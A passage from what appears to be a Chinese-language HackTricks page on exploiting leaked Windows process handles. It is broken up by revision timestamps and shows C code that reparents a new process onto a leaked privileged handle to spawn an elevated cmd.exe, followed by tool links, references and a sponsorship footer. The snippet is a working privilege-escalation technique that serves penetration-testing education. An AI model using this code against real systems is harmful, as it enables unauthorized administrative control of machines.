hProc = GetVulnProcHandle();
if ( hProc != NULL) {
// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
ZeroMemory(& si, sizeof(STARTUPINFOEXA));
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(), 0, size );
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, & hProc, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
// Spawn elevated cmd process
ret = CreateProcessA( "C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE,
EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOA)(& si), & pi );
if (ret == FALSE) {
printf("[!] Error spawning new process: [%d]\n", GetLastError());
return -1;
}
2020-07-15 15:43:14 +00:00
}
2022-03-21 11:02:30 +00:00
2023-08-03 19:12:22 +00:00
Sleep(20000);
return 0;
}
```
## 其他工具和示例
2022-03-21 11:02:30 +00:00
2022-04-05 22:24:52 +00:00
* [**https://github.com/lab52io/LeakedHandlesFinder** ](https://github.com/lab52io/LeakedHandlesFinder )
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
该工具允许您监视泄漏的句柄以查找易受攻击的句柄,甚至可以自动利用它们。它还具有一个用于泄漏句柄的工具。
2022-03-21 11:02:30 +00:00
2022-04-05 22:24:52 +00:00
* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles** ](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles )
2022-03-21 11:02:30 +00:00
2024-02-09 01:27:24 +00:00
另一个用于泄漏句柄并利用它的工具。
2022-03-21 11:02:30 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2022-03-21 11:02:30 +00:00
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/ ](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/ )
* [https://github.com/lab52io/LeakedHandlesFinder ](https://github.com/lab52io/LeakedHandlesFinder )
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html ](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html )
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 03:56:12 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-09 01:27:24 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-08 03:56:12 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 01:27:24 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**上关注**我们。
2024-02-08 03:56:12 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >